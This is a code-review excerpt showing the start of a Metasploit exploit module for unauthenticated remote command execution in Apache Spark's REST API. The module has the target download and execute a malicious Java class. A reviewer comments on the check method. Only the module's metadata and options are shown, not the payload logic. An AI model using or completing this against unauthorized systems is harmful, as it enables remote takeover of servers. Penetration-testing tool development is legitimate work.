modules/exploits/linux/http/spark_unauth_rce.rb

```diff
@@ -0,0 +1,173 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Spark Unauthenticated Command Execution',
+      'Description'    => %q{
+          This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
+          It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'aRe00t',                            # Proof of concept
+          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.weibo.com/ttarticle/p/show?id=2309404187794313453016'],
+          ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']
+        ],
+      'Platform'       => 'java',
+      'Arch'           => [ARCH_JAVA],
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Dec 12 2017',
+      'DefaultTarget'  => 0,
+      'Notes'          =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Stability'   => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION]
+        }
+    ))
+
+    register_options([
+      Opt::RPORT(6066)
+    ])
+
+    register_advanced_options([
+      OptString.new('DownUri', [false, 'The URI to use for this exploit to download and execute. (default is random)'])
+    ])
+
+    deregister_options('URIPATH')
+  end
+
+  def check
+    return CheckCode::Appears if get_version
```

Comment:
```suggestion
    return CheckCode::Detected if get_version
```
Maybe use `CheckCode::Detected` instead. Although that may not be correct either. See `get_version` comment.